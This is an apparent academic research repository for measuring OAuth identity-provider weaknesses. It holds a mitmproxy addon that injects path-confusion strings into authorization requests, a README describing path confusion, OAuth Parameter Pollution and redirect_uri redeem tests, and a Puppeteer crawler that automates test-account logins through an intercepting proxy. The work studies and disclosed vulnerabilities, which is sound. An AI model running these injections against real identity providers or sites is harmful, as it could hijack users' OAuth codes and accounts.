file=sys.stdout) 277 | test=urlparse(test1) 278 | testpath=test.path 279 | print(f'test path extracted: {testpath}', file=sys.stdout) 280 | newpath=testpath+ctx.options.inject 281 | print(f'new path generated: {newpath}', file=sys.stdout) 282 | newurl=test._replace(path=newpath).geturl() 283 | print(f'new url generated used for injection(unquoted): {newurl}', file=sys.stdout) 284 | quotedurl=urllib.parse.quote(newurl, safe='') 285 | print(f'new url generated(quoted): {quotedurl}', file=sys.stdout) 286 | 287 | temp=flow.request.url 288 | print(f'temp string: {temp}', file=sys.stdout) 289 | 290 | new=temp.replace(ret,newurl) 291 | print(f'temp string modified with replace: {new}', file=sys.stdout) 292 | flow.request.url=new 293 | 294 | 295 | addons = [ 296 | PathConfString() 297 | ] 298 | 299 | 300 | 301 | 302 | 303 | 304 | 305 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # IdPs Identification 2 | 3 | Crawls a list of websites to search for the OAuth IdPs they use. 4 | 5 | ## How does it work 6 | 7 | On a high level, the script does the following: 8 | 9 | 1. Visit the homepage of the site 10 | 2. If the homepage does not contain the login functionalities: 11 | 1. Crawl the site to find the login page. 12 | 3. Search the OAuth URLs and buttons on the login page. 13 | 14 | ### Login pages identification 15 | 16 | To detect a login page, the script looks for the following: 17 | 18 | - Searches for links that contain some keywords (e.g., `/signin`, `/login`). 19 | - Checks if the current page contains an input field of type `password`. 20 | 21 | ### OAuth URLs and buttons identification 22 | 23 | To detect the OAuth URLs and buttons, the script looks for the following: 24 | 25 | For each **provider**: 26 | 27 | - Search for links containing the **provider** name and some keywords (e.g., `auth`, `login`, `signin'). 28 | - Searches for specific HTML tags (`a`, `input`, and `button`) that contain the **provider** name and some keywords (e.g., `auth`, `login`, `signin'). 29 | - If a tag is not found, it optionally searches through all the other HTML tags 30 | 31 | **Note**: the script makes heavy use of **denylists** to avoid false positives. The denylists are compiled by observing the results of the script while debugging and are not exhaustive. 32 | 33 | ## How to run it 34 | 35 | - Install the dependencies: `pip install -r requirements.txt` 36 | 37 | ### On a single website 38 | 39 | Run the script: `python3 idps-identification.py -t ` 40 | 41 | E.g.: 42 | `python3 idps-identification.py -t imdb.com` 43 | `python3 idps-identification.py -t medium.com` 44 | 45 | #### Script arguments 46 | 47 | ```bash 48 | -h, --help show this help message and exit 49 | -t TARGET, --target TARGET 50 | Target website 51 | -S STATS, --stats STATS 52 | Statistics folder 53 | -R REPORTS, --reports REPORTS 54 | Reports folder 55 | -l LOGS, --logs LOGS Logs folder 56 | -L LINKS, --links LINKS 57 | File containing the login links 58 | -m MAX, --max MAX Maximum number of URLs to crawl (Default: 10) 59 | -N, --no-headless Do not use a headless browser 60 | -r, --retest Retest the URLs 61 | ``` 62 | 63 | ### On a list of websites 64 | 65 | 1) Obtain the list of sites: 66 | On the Tranco site, it is possible to download the most recent list of the Top 1 million websites: . The script expects to receive a list of sites with the same Tranco list format, although a slice of the list (e.g. first 30 sites) could be provided to the script. 67 | 68 | 2) Run the script: `python3 launcher.py --sites ` 69 | 70 | The launcher will test the websites in the file concurrently (up to the maximum number of concurrent tests). 71 | 72 | #### Launcher arguments 73 | 74 | ```bash 75 | -h, --help show this help message and exit 76 | -s SITES, --sites SITES 77 | Sites list 78 | -m MAX, --max MAX Maximum number of sites to test concurrently (default: 5) 79 | -a ARGUMENTS, --arguments ARGUMENTS 80 | Additional arguments to pass to the crawler (use with = sign: -a="--arg1 --arg2") 81 | -t, --testall Test also already tested sites 82 | -c CRAWLER, --crawler CRAWLER 83 | Alternative crawler script name to launch 84 | -d, --debug Enable debug mode 85 | ``` 86 | 87 | ### Workflow 88 | 89 | The structure of the output JSON file of the `idps-identification.py` script differs from the one needed for the next step of **OAuth trigger evaluation**; therefore, we need to convert the JSON file to the correct format. To do so, we use the `convert.sh` script with the same list of sites used before to identify the OAuth triggers. 90 | 91 | Run the script: `/convert.sh ` 92 | 93 | The sites file list that is provided to the convert.sh script should follow the same format csv of the Tranco List. 94 | 95 | The script: 96 | 97 | 1. Calls `generate-sites-files.py` to generate the single JSON files with the structure needed by the next step 98 | 99 | 2. Calls `merge-sites-files.py` to merge the single JSON files into a single one (json/sites.json). 100 | 101 | ## Notice 102 | 103 | The script has a high number of false-positives rates. In our research, this has not been a problem since this was only the first step and, in the next one, we used an automated browser to click on the buttons detected by this script to check whether they are OAuth buttons or not. In this script, we prioritized not missing any OAuth button, even if this means having many false positives. Improving the denylists to reduce the false-positives rate is recommended if this script is used for other purposes. 104 | 105 | 106 | # OAuth trigger validation 107 | 108 | Receives a list of the site's login pages and verifies the OAuth button identified to verify they can initiate an OAuth flow. 109 | The results are the list of the site's OAuth trigger evaluated (Verified_Sites.json) and the list of TOP IdPs(Top_Idps.json). 110 | 111 | ## How does it work 112 | 113 | On a high level, the script does the following: 114 | 115 | 1) surf over the login page of the site and one by one exercise the OAuth trigger identified previously 116 | 2) the script looks for changes in the browser, such as a new tab opening or a change of the page URL 117 | 3) if the change occurs, it evaluates the landing page and searches for login page identifier as the presence of the login button and OAuth identifiers in the page URL 118 | 119 | Output: 120 | The output folder contains a series of files with the result for each error type. In the script folder, the file Verified_Sites.json will include the site's login pages with the OAuth trigger correctly functioning and the file Top_Idps.json will contain the list of most used IdPs among the sites inspected. 121 | 122 | ## How to run it 123 | 124 | 1) Install NodeJS from https://nodejs.org/en/download/. 125 | Then, run the following command to install all the dependencies: 126 | 127 | `npm install chrome-launcher chrome-remote-interface url-parse until tldjs path argparse puppeteer fs`` 128 | 129 | Adjust the Chrome executable path in verifysites.js at line 81 to point to the Chrome executable file 130 | Run the script: `python3 Start-SitesVerification.py ` 131 | 132 | The list of sites that should be provided to the Start-SitesVerification is the result of the execution of the commands described above (the result of convert.sh), and it is stored in json/sites.json 133 | 134 | E.g.: 135 | `python3 Start-SitesVerification.py json/sites.json outputfolder` 136 | 137 | If the reviewers want to skip the steps mentioned above (OAuth URL and button identification), the Smallsetofsites.json could also be used to verify the script's functioning by running this command: 138 | 139 | `python3 Start-SitesVerification.py Smallsetofsites.json outputfolder` 140 | 141 | 142 | ## Notice 143 | The threshold to classify the IdPs as TopIdP is represented by the value at line 385 of the script Start-SitesVerification.py (>3 sites adoption). 144 | 145 | # Path confusion Experiment 146 | 147 | The script receives the list of sites where to inject the Path Confusion and logs all the network communications. 148 | 149 | ## Notice 150 | Before starting the experiment, the IdPs of interest should be selected, and for those, an account and the login steps need to be codified in the IdPs_info file (step IdP credentials). 151 | 152 | To simplify the reviewer's job, we included in the file idps_info.json the login information of 3 IdPs (Facebook, line, Twitter) 153 | The structure of the file is described below. 154 | 155 | We provide a limited number of IdPs info to avoid any potential blockage by the IdPs for suspicious login from unrecognized location, which could negatively affect other ongoing research project that currently uses these test accounts. 156 | 157 | ## IdPs_info file 158 | 159 | The IdPs information file contains the IdPs login information as the credential and the steps to perform the login flow. 160 | The fields *-Type can have an attribute: ID, Name, ClassName or exception. 161 | Each represents the type of the element's attribute the crawler will use to identify and fill or click the element in the IdP's login page. 162 | The Button-Type extends the available attributes to XPath and QuerySelector. Representing the xpath of the element or the query for the selector which identifies the element in the page. 163 | The exception type allows flexibility in the configuration of the action performed by the crawler to accommodate any possible variation in the login procedure between IdPs. 164 | 165 | e.g: `fill%%Name%%loginfmt%%test@example.com##sleep3##click%%ID%%idSIButton9%%login##sleep3"` 166 | this exception allows one to fill out the username form and click over the button with ID idSIButton9 before filling the password field. 167 | 168 | The exception could contain any set of instructions among fill, click, or sleep. 169 | Fill is composed of the action fill the separator %% the *-type the separator %% the content of the fill action. 170 | Click is composed of the action click the separator %% the *-type the separator %% the attribute separator %% the login step either Login or Grant 171 | Sleep is composed of the action sleep, which represents a pause in the login flow and the number of seconds of the pause. 172 | 173 | ## How to run it 174 | 175 | Before Starting the experiment, the Mitmproxy should be installed in the system. 176 | The installation instructions for each operative system could be found at https://mitmproxy.org/ 177 | The required version is 9.0.1 178 | 179 | Run the script: `python3 Start-PathConfusion-exp.py ` 180 | 181 | Example: 182 | `python3 Start-PathConfusion-exp.py Verified_Sites.json PathConfusion-experiment Pathconfusion-attacklist.json idp_keywords.json Idps_info.json` 183 | 184 | 185 | #### Scripts arguments 186 | 187 | file containing sites information (login pages) with OAuth trigger information for each IdP identified 188 | 189 | experiment name used for log purpose 190 | 191 | The attack list file contains a dictionary of attack strings where the name of the attribute would also represent the name of the folder under which all the result files associated with that attack string will be stored, and the value field represents the attack string which will be injected in the OAuth flow. (Pathconfusion-attacklist.json provided in the repo) 192 | 193 | IdPs keywords are a set of keywords used to identify the Authorization request of the OAuth flow where to inject the Path confusion string. (idp_keywords.json provided in the repo) 194 | 195 | IdPs information file, which contains the IdPs account information and the login step to automate the login procedure. (Idps_info.json provided in the repo) 196 | 197 | 198 | # Path confusion result 199 | 200 | The script received the path to analyze the results file generated at the previous step and the site files where the measurement has been performed. 201 | The script will process all the measurement result files in the folder and identify the IdPs vulnerable to the PathConfusion string injected in the OAuth flow for each folder. 202 | This will provide the total set of IdPs vulnerable to one of the Path confusion strings tested, as reported in Section 4.3. 203 | 204 | 205 | ## How to run it 206 | Run the script: `python3 Analyze_Pathconfusion.py ` 207 | 208 | ## Notice 209 | To simplify the reviewer's job, we provide the data obtained from the execution of the previous command on a small subset of tested sites here: 210 | https://drive.google.com/file/d/1JKNcJu8sjCjY5MKPQIk3ar02AFSrpXzB/view?usp=sharing 211 | 212 | 213 | We provide this data because, potentially, no IdP should be found vulnerable thanks to our previous responsible disclosure to all the IdPs found to be vulnerable. 214 | This data set can be used as input for the Analyze_Pathconfusion.py script to effectively validate the script functionality using this command: 215 | 216 | Run the script: `python3 Analyze_Pathconfusion.py Pathconfusion-measurement Smallsetofsites.json` 217 | 218 | # OAuth Parameter Pollution: 219 | 220 | ## How does it work 221 | 222 | To identify the IdPs vulnerable to the OPP attack, we implemented a testing Client for each IdP and manually injected an Oauth code parameter in the redirect_uri of the Authorization request. To verify the IdP vulnerability, we observed when the injected code is reflected in the Authorization response. The IdPs that reflect the injected parameter are considered vulnerable. 223 | The number of IdPs vulnerable represents the result reported in Section 5.2. 224 | 225 | ## How to run it 226 | 227 | The execution of the test is relatively simple and does not involve any automation of the procedure. 228 | 229 | Before running the script, a folder named templates needs to be created, and the files attack.html and login.html should be placed inside of it 230 | The client application (present in the upper folder of templates) is then initiated by running this command: 231 | `python3 facebook.py` 232 | 233 | The Client application has three buttons that allow the authorization request initiation normally or with the PathConfusion or the OPP attack injection. 234 | The attacks are hardcoded in the application methods, and this option is also provided for the redemption step. 235 | Any changes to these methods should be performed in the application code. 236 | The complete cases for each IdP can be tested and inspected using the available requ 237 | 238 | ## Notice 239 | 240 | We provide only the skeleton of a testing Client application (Facebook, for example) we used to test each IdP. 241 | For each IdP it is necessary to create a new configuration file with the IdP, which will include the registered redirect_uri and provide the Client_ID and the Client_secret that should be included in the application code to work correctly. 242 | For Facebook, the instructions to create such a configuration could be found here: 243 | https://developers.facebook.com/docs/facebook-login/guides/advanced/manual-flow 244 | 245 | Github: 246 | https://docs.github.com/en/apps/oauth-apps/building-oauth-apps/creating-an-oauth-app 247 | 248 | OK.ru: 249 | https://apiok.ru/en/ext/oauth/ 250 | 251 | LinkedIn: 252 | https://learn.microsoft.com/en-us/linkedin/shared/authentication/authorization-code-flow?tabs=HTTPS1 253 | 254 | 255 | Once the application parameters (line 16 to 25) has been included, the script can be run, and the experiment could start by using the provided button in the web interface 256 | 257 | # redirect URI Validation in Redeem Proces: 258 | 259 | ## How does it work 260 | 261 | By reusing the Client Application used in the previous step to identify the IdPs vulnerable to the OPP attack, we measured the IdPs that improperly validate the redirect_uri in the Redeem Process. 262 | We followed the same methodology of the previous step by injecting an OAuth code in the Authorization step. Once we receive the two OAuth code parameters, we initiate the redeem step with the newly generated code by the IdP with an untouched redeem request. This will create a difference between the redirect_uri used in the Authorization request(poisoned) and the one provided in the Access Token request. The IdPs that allow the flow to proceed are marked as vulnerable. This will give the result of Section 6.2 263 | 264 | The execution of the test is relatively simple and does not involve any automation of the procedure. 265 | -------------------------------------------------------------------------------- /Pup-Crawler.js: -------------------------------------------------------------------------------- 1 | const puppeteer = require('puppeteer'); 2 | const FS = require('fs'); 3 | const TLDJS = require('tldjs'); 4 | const ArgParse = require('argparse'); 5 | 6 | let SITE = null; 7 | let IDP = null; 8 | let IDP_Info = {}; 9 | let XPathSSOElem=null; 10 | let newwindow=false; 11 | let measurement=""; 12 | 13 | function parseArguments() { 14 | let parser = new ArgParse.ArgumentParser({ 15 | add_help:true, 16 | description: 'Argparse example' 17 | }); 18 | 19 | parser.add_argument( 20 | '--parameters', 21 | { 22 | action: 'store', 23 | required: true, 24 | help: 'parameters file' 25 | } 26 | ); 27 | 28 | let args = parser.parse_args(); 29 | PARAMETER= args.parameters; 30 | } 31 | 32 | async function Exception(page,commands,step){ 33 | console.log("exception received commands: %s",commands); 34 | instructions=commands.split('##'); 35 | console.log("instructions lenght:%s",instructions.length); 36 | console.log(instructions); 37 | try { 38 | for (var i = 0; i < instructions.length; i++) { 39 | console.log("Analyze instruction:%s",instructions[i]); 40 | if(instructions[i].includes("sleep") && !(instructions[i].includes("%%"))){ 41 | console.log("wait for next instruction:%s",instructions[i]); 42 | await page.waitForTimeout(Number(instructions[i].replace("sleep",""))*1000); 43 | } 44 | else{ 45 | if(instructions[i].includes("%%")){ 46 | split=instructions[i].split("%%"); 47 | //first command type second id type third id 48 | if(split[0]==="fill"){ 49 | await Fillform(page,split[1],split[2],split[3]); 50 | } 51 | else if(split[0]==="click"){ 52 | await Click_Button(page,split[1],split[2],split[3]); 53 | } 54 | } 55 | else{ 56 | console.log("execute next instruction:%s",instructions[i]); 57 | await page.evaluate(instructions[i]); 58 | } 59 | } 60 | } 61 | } catch (ex) { 62 | console.log("Step: %s Exception in execution of instruction: %s",step,commands); 63 | return ex.message; 64 | } 65 | return true; 66 | } 67 | 68 | 69 | async function Fillform(page,form_type,form,content){ 70 | //include try catch for node not found and report error 71 | console.log("Fill form received form type: %s\nform: %s\ncontent: %s",form_type,form,content); 72 | try { 73 | if(form_type==="ID"){ 74 | await page.type("[id=\""+form+"\"]",content, { delay: 100 }); 75 | return true; 76 | } 77 | else if(form_type==="Name"){ 78 | await page.type("[name=\""+form+"\"]",content, { delay: 100 }); 79 | return true; 80 | } 81 | else if(form_type==="ClassName"){ 82 | await page.type("[class=\""+form+"\"]",content, { delay: 100 }); 83 | return true; 84 | } 85 | else if(form_type==="exception"){ 86 | return form; 87 | } 88 | } catch (ex) { 89 | console.log("Exception in Filling form: %s and content: %s",form,content); 90 | console.log(ex); 91 | return false; 92 | } 93 | } 94 | 95 | async function Click_Button(page,button_type,button,step){ 96 | console.log("Click Button received button type: %s\nbutton: %s\nstep: %s",button_type,button,step); 97 | try { 98 | if(button_type==="XPath"){ 99 | console.log("Click_Button with XPath element"); 100 | var elements = await page.$x(button); 101 | console.log("obtained this element:%s",elements); 102 | pr=await elements[0].click(); 103 | console.log("result click: %s",pr); 104 | return true; 105 | } 106 | else if(button_type==="ID"){ 107 | console.log("Click_Button with ID element"); 108 | pr=await page.click("[id=\""+button+"\"]"); 109 | console.log("result click: %s",pr); 110 | return true; 111 | } 112 | else if(button_type==="Classname"){ 113 | console.log("Click_Button with ClassName element"); 114 | pr=await page.click("[class=\""+button+"\"]"); 115 | console.log("result click: %s",pr); 116 | return true; 117 | } 118 | else if(button_type==="Name"){ 119 | console.log("Click_Button with Name element"); 120 | pr=await page.click("[name=\""+button+"\"]"); 121 | console.log("result click: %s",pr); 122 | return true; 123 | } 124 | else if(button_type==="QuerySelector"){ 125 | console.log("Click_Button with QuerySelector element"); 126 | pr=await page.click(button); 127 | console.log("result click: %s",pr); 128 | return true; 129 | } 130 | else if(button_type==="exception"){ 131 | return Exception(page,button,step); 132 | //return button; 133 | } 134 | } catch (ex) { 135 | if(step==="Grant"){ 136 | console.log(ex.message); 137 | console.log("received an error during grant click. Continue the measurement and check if sproper redirect and closed window"); 138 | return true; 139 | } 140 | else{ 141 | console.log("Step: %s Exception in execution!!!!!",step); 142 | console.log(ex.message); 143 | return ex.message; 144 | } 145 | } 146 | } 147 | 148 | async function FindIdentifies(html) { 149 | var identifiers=["Mario Rossi","Mario","Rossi","mario","rossi","mario rossi","tommycall.text@gmail.com","tommycall.text"]; 150 | var arrayLength = identifiers.length; 151 | for (var i = 0; i < arrayLength; i++) { 152 | let res = html.search(identifiers[i]) 153 | if(res >0){ 154 | console.log("identifier found"); 155 | console.log(identifiers[i]); 156 | return true; 157 | } 158 | } 159 | //search for identifies in html 160 | return false; 161 | } 162 | 163 | async function Savehtml(name,html){ 164 | //save file with HTML 165 | FS.writeFileSync(name+"-HTMLWithID",html); 166 | } 167 | 168 | async function ErrorInURL(checkURL) { 169 | //search for erorr in URL 170 | //expand error in url to make it complete 171 | var identifiers=["error","fail"]; 172 | var arrayLength = identifiers.length; 173 | for (var i = 0; i < arrayLength; i++) { 174 | let res = checkURL.search(identifiers[i]) 175 | if(res >0){ 176 | console.log("error found in url"); 177 | console.log(identifiers[i]); 178 | console.log(checkURL); 179 | return true; 180 | } 181 | } 182 | return false; 183 | } 184 | 185 | async function ObtainSelector(type,string){ 186 | //console.log("obtain selector received type: %s\nString: %s",type,string); 187 | if(type==="exception"){ 188 | instructions=string.split('##'); 189 | for (var i = 0; i < instructions.length; i++) { 190 | if(instructions[i].includes("fill")){ 191 | div=instructions[i].split('%%'); 192 | temp= await ObtainSelector(div[1],div[2]); 193 | return temp; 194 | } 195 | } 196 | return ""; 197 | } 198 | else if(type==="Name"){ 199 | return "[name=\""+string+"\"]"; 200 | } 201 | else if(type==="ID"){ 202 | return "[id=\""+string+"\"]"; 203 | } 204 | else if(type==="ClassName"){ 205 | return "[class=\""+string+"\"]"; 206 | } 207 | return ""; 208 | } 209 | 210 | async function AnalizeResult(browser,IDP,domainbegin,initial_url,domainreturn,return_url,html,measurement){ 211 | console.log("analyze result measurement:"); 212 | 213 | if(domainreturn===IDP){ 214 | //blocked in login part 215 | console.log("login procedure stopped in IDP!!!"); 216 | console.log("RESULT-EXPERIMENT:-1"); 217 | return -1; 218 | } 219 | else{ 220 | let verify=await FindIdentifies(html); 221 | if(verify){ 222 | Savehtml(OutputPath+OutputName,html); 223 | console.log("found identifiers in the redirection page"); 224 | console.log("domain return:%s Domain begin:%s",domainreturn,domainbegin); 225 | if(domainreturn === domainbegin){//back to the same domain of initial page 226 | if(return_url === initial_url){ 227 | console.log("same url after login succesful login!!!"); 228 | console.log("RESULT-EXPERIMENT:1"); 229 | return 1; 230 | } 231 | else{ 232 | let check= await ErrorInURL(return_url); 233 | console.log("print check url error:%s",check); 234 | if(check){ 235 | //error in url not succesful 236 | console.log("found identifier in page but error in redirect url-->visual check!!!"); 237 | console.log("RESULT-EXPERIMENT:-1"); 238 | return -1; 239 | } 240 | else{ 241 | console.log("success login redirect to initial domain with identifiers in the page"); 242 | console.log("RESULT-EXPERIMENT:1"); 243 | return 1; 244 | } 245 | } 246 | } 247 | else{ 248 | //diff domain but identifiers in html look for error in url 249 | let check= await ErrorInURL(return_url); 250 | console.log("print check url error:%s",check); 251 | if(check){ 252 | //error in url not succesful 253 | console.log("found identifier in page but redirect to a different domain and error in redirect url-->visual check!!!"); 254 | console.log("RESULT-EXPERIMENT:-1"); 255 | return -1; 256 | } 257 | else{ 258 | console.log("redirect to a different domain with identifiers in page and no error check for connected domain!!"); 259 | console.log("domain return:%s Domain begin:%s",domainreturn,domainbegin); 260 | console.log("RESULT-EXPERIMENT:0"); 261 | return 1; 262 | } 263 | } 264 | } 265 | else{ 266 | console.log("NOT found identifiers in the redirection page"); 267 | console.log("domain return:%s Domain begin:%s",domainreturn,domainbegin); 268 | if(domainreturn === domainbegin){//back to the same domain of initial page 269 | if(return_url === initial_url){ 270 | console.log("success login redirect to initial link but identifiers not found in the page->visual check!!!"); 271 | console.log("RESULT-EXPERIMENT:0"); 272 | return 0; 273 | } 274 | else{ 275 | let check= await ErrorInURL(return_url); 276 | console.log("print check url error:%s",check); 277 | if(check){ 278 | console.log("no identifiers in page redirect to a different page with error in redirect url"); 279 | console.log("RESULT-EXPERIMENT:-1"); 280 | return -1; 281 | } 282 | else{ 283 | console.log("success login redirect to same domain of initial page no error in url but identifiers not found in the page->visual check!!!"); 284 | console.log("RESULT-EXPERIMENT:0"); 285 | return 0; 286 | } 287 | } 288 | } 289 | else{ 290 | console.log("redirect to different domain and no identifiers in page not succesful login!!"); 291 | console.log("RESULT-EXPERIMENT:-1"); 292 | return -1; 293 | } 294 | } 295 | } 296 | } 297 | 298 | async function AnalizeResult_New_Window(browser,IDP,page,newwindow,domainbegin,initial_url,measurement){ 299 | 300 | console.log("New windows: measurement:%s analyze result received:initial_url:%s\ndomain begin:%s",measurement,initial_url,domainbegin); 301 | urlcheck=page.url(); 302 | 303 | if(urlcheck.includes("#")){ 304 | urlcheck=urlcheck.split("#")[0]; 305 | console.log("remove fragment to make a right comparison new url is:%s",urlcheck); 306 | } 307 | console.log("page url extracted from page variable:%s",urlcheck); 308 | console.log("print variables used for the check:page url%s\nIDP:%s",page.url(),IDP); 309 | if(urlcheck===initial_url && TLDJS.parse(newwindow.url()).domain===IDP){ 310 | //take screenshot of still open window and stop here error in login!! 311 | console.log("initial page with the same url and new windows stuck with IDP"); 312 | await newwindow.screenshot({path: OutputPath+OutputName+"_StillOpenWindow_AfterSSOLogin.png" ,fullPage: true}); 313 | var html=await page.content(); 314 | let verify=await FindIdentifies(html); 315 | 316 | if(verify){ 317 | Savehtml(OutputPath+OutputName,html); 318 | console.log("login window still open check why!!!!"); 319 | console.log("success login redirect to initial domain with identifiers in the page"); 320 | console.log("RESULT-EXPERIMENT:1"); 321 | await browser.close(); 322 | process.exit(1); 323 | } 324 | else{ 325 | console.log("new windows still open no identifiers in initial window and no redirection in initial page error in login procedure!!"); 326 | await browser.close(); 327 | console.log("RESULT-EXPERIMENT:-1"); 328 | process.exit(-1); 329 | } 330 | } 331 | else if(urlcheck===initial_url && TLDJS.parse(newwindow.url()).domain===domainbegin){ 332 | //redirected to initial domain in new window check that window 333 | console.log("redirected to the initial site domain in the new window, analyze this windows for the result"); 334 | var html=await newwindow.content(); 335 | return_url= await newwindow.url(); 336 | domainreturn= await TLDJS.parse(return_url).domain; 337 | 338 | await AnalizeResult(browser,IDP,domainbegin,initial_url,domainreturn,return_url,html,measurement); 339 | } 340 | else if(!(urlcheck===initial_url)){ 341 | //still open new window but not initial url check error and identifiers 342 | let return_url=page.url(); 343 | let check= await ErrorInURL(return_url); 344 | console.log("print check url error:%s",check); 345 | if(check){ 346 | console.log("login windows still open check why!! and error in redirect url-->visual check!!!"); 347 | await browser.close(); 348 | console.log("RESULT-EXPERIMENT:-1"); 349 | process.exit(-1); 350 | } 351 | else{ 352 | var html=await page.content(); 353 | let verify=await FindIdentifies(html); 354 | if(verify){ 355 | Savehtml(OutputPath+OutputName,html); 356 | console.log("login window still open check why!!!!"); 357 | console.log("success login identifiers in initial page"); 358 | console.log("RESULT-EXPERIMENT:1"); 359 | await browser.close(); 360 | process.exit(1); 361 | } 362 | else{ 363 | console.log("new windows still open no identifiers in initial page no error but redirected to a different page -->visual check"); 364 | await browser.close(); 365 | console.log("RESULT-EXPERIMENT:-1"); 366 | process.exit(-1); 367 | } 368 | } 369 | } 370 | } 371 | 372 | 373 | 374 | (async() => { 375 | console.log("Step1 get info for the crawler"); 376 | parseArguments(); 377 | let rawdata = FS.readFileSync(PARAMETER); 378 | let params = JSON.parse(rawdata); 379 | SITE = params["site"]; 380 | IDP = params["idp"]; 381 | measurement =params["measurement"]; 382 | IDP_Info = params["idp_info"]; 383 | XPathSSOElem = params["xpath"]; 384 | OutputName = params["name"]; 385 | OutputPath = params["outpath"]; 386 | console.log("Measurements: %s\nparameters received site: %s\nIDP: %s\nIDP_Info: %s\nXPathSSOelem: %s\nOutputpath: %s\nOutputName: %s",measurement,SITE,IDP,IDP_Info,XPathSSOElem,OutputPath,OutputName); 387 | 388 | 389 | //Step2: surf on the login page save initial page url then take a screenshot and then click in the SSO element 390 | console.log("Step2:start the login procedure") 391 | //start browser 392 | //'--proxy-server=http://127.0.0.1:7777', 393 | const browser = await puppeteer.launch({args:['--disable-gpu', 394 | '--no-sandbox', 395 | '--disable-popup-blocking', 396 | '--disable-notifications', 397 | '--password-store=basic', 398 | '--proxy-server=http://127.0.0.1:7777', 399 | '--ignore-certificate-errors'], 400 | headless: false, 401 | executablePath: '/bin/google-chrome-stable'}); 402 | const page = await browser.newPage(); 403 | try{ 404 | await page.goto(SITE, {timeout:120000, waitUntil: 'networkidle2'}); 405 | }catch(ex){ 406 | console.log("error in surfing to the login page!ABORT-EXPERIMENT:YES"); 407 | console.log(ex); 408 | await browser.close(); 409 | process.exit(1); 410 | } 411 | let initial_url=page.url(); 412 | if(initial_url.includes("#")){ 413 | console.log("remove fragment from initial url: %s",initial_url); 414 | initial_url=initial_url.split("#")[0]; 415 | console.log("new url: %s",initial_url); 416 | } 417 | 418 | var domainbegin = TLDJS.parse(initial_url).domain; 419 | await page.waitForTimeout(5000); 420 | 421 | //take screenshot 422 | await page.screenshot({path: OutputPath+OutputName+"_Initial.png" ,fullPage: true}); 423 | 424 | //click XPath 425 | try{ 426 | var SSO_Elem = await page.$x(XPathSSOElem); 427 | }catch(ex){ 428 | if(ex.message.includes("Evaluation failed")){ 429 | console.log("try using a selector"); 430 | var SSO_Elem= await page.click(XPathSSOElem); 431 | } 432 | } 433 | console.log("SSO_Elem: %s",SSO_Elem); 434 | try{ 435 | var SSO_Elem = await page.$x(XPathSSOElem); 436 | console.log("SSO_Elem: %s",SSO_Elem); 437 | await Promise.all([SSO_Elem[0].click(), 438 | page.waitForNavigation({timeout:20000, waitUntil: 'networkidle2'})]); 439 | } 440 | catch{ 441 | console.log("click do not caused the redirect check if opened a new windows or stop"); 442 | } 443 | //gives time to obtain any new tab opened 444 | await page.waitForTimeout(3000); 445 | var Open_Pages = await browser.pages(); 446 | console.log("numbers of pages after click:%s",Open_Pages.length); 447 | 448 | /* 449 | for (var i = 0; i < Open_Pages.length; i++) { 450 | console.log("tab:%s) domain tab: %s",i,TLDJS.parse(Open_Pages[i].url()).domain); 451 | } 452 | 453 | 454 | let opentabscheck = Open_Pages.length; 455 | if(opentabscheck<=2){//no new windows 456 | var check_urlfirst=page.url() 457 | var domaincheck = TLDJS.parse(check_urlfirst).domain; 458 | 459 | if(check_urlfirst===initial_url){ 460 | //try to use different methof to trigger login with IDP 461 | console.log("test new trigger method"); 462 | if(IDP.includes(".")){ 463 | temp="//*[contains(text(), \'"+IDP.split(".")[0]+"\')]" 464 | } 465 | else{ 466 | temp="//*[contains(text(), \'"+IDP+"\')]" 467 | } 468 | var new_trigger = await page.$x(temp); 469 | try{ 470 | await new_trigger[0].click(); 471 | } 472 | catch(ex){ 473 | console.log("new trigger not working Continue"); 474 | } 475 | } 476 | } 477 | */ 478 | await page.waitForTimeout(6000); 479 | 480 | //Step3: identify new open window(it need one sec to identify new windows) and take a screenshot of initial tab page after SSO click 481 | console.log("step3:identify if open new window and go ahead with login"); 482 | let opentabs = Open_Pages.length; 483 | console.log("numbers of pages after click:%s",Open_Pages.length); 484 | Open_Pages[1].screenshot({path: OutputPath+OutputName+"_AfterSSOClick.png" ,fullPage: true}); 485 | 486 | if(opentabs>2){//new window case 487 | //Step4: look at tabs and if there is one with IDP domain go and perform login 488 | try{ 489 | var tabindex_IDP=-1; 490 | for (var i = 0; i < Open_Pages.length; i++) { 491 | if(Open_Pages[i].url()!=initial_url && Open_Pages[i].url()!="about:blank"){ 492 | selector=await ObtainSelector(IDP_Info["Fill"]["User-Type"],IDP_Info["Fill"]["Form-User"]); 493 | //check if the page has the username form for the login or the IDP as domain 494 | console.log("obtained this selector: %s",selector); 495 | try{ 496 | test=await Open_Pages[i].waitForSelector(selector,{timeout:10000}); 497 | }catch(ex){ 498 | if(ex.message.includes("failed")){ 499 | console.log("not found username form in tab!"); 500 | test=null; 501 | } 502 | } 503 | console.log("result of the selector search:%s",test); 504 | if(!(test===null) || TLDJS.parse(Open_Pages[i].url()).domain===IDP){ 505 | var tabindex_IDP=i; 506 | } 507 | } 508 | } 509 | 510 | console.log("tab index after search:%s",tabindex_IDP); 511 | if (tabindex_IDP===-1){ 512 | console.log("tab not found!!"); 513 | console.log("Open a new tab but not with the idp domain check xpath! ABORT-EXPERIMENT:YES"); 514 | await browser.close(); 515 | process.exit(1); 516 | } 517 | else{ 518 | newwindow=true; 519 | let newurl=Open_Pages[tabindex_IDP].url(); 520 | 521 | //fill forms 522 | var asd=await Fillform(Open_Pages[tabindex_IDP],IDP_Info["Fill"]["User-Type"],IDP_Info["Fill"]["Form-User"],IDP_Info["Username"]); 523 | console.log("new window result first fill form: %s",asd); 524 | if(asd===false){ 525 | console.log("fill form unsucessful stop ABORT-EXPERIMENT:YES"); 526 | await browser.close(); 527 | process.exit(1); 528 | } 529 | else if(asd.length!=undefined && !(asd.includes("No node found for selector"))){ 530 | await Exception(Open_Pages[tabindex_IDP],asd,"login"); 531 | } 532 | Open_Pages[tabindex_IDP].bringToFront(); 533 | 534 | await Open_Pages[tabindex_IDP].waitForTimeout(3000); 535 | asd=await Fillform(Open_Pages[tabindex_IDP],IDP_Info["Fill"]["Pass-Type"],IDP_Info["Fill"]["Form-Pass"],IDP_Info["Password"]); 536 | console.log("new window result first fill form: %s",asd); 537 | if(asd===false){ 538 | console.log("fill form unsucessful stop ABORT-EXPERIMENT:YES"); 539 | await browser.close(); 540 | process.exit(1); 541 | } 542 | else if(asd.length!=undefined && !(asd.includes("No node found for selector"))){ 543 | await Exception(Open_Pages[tabindex_IDP],asd,"login"); 544 | } 545 | 546 | await 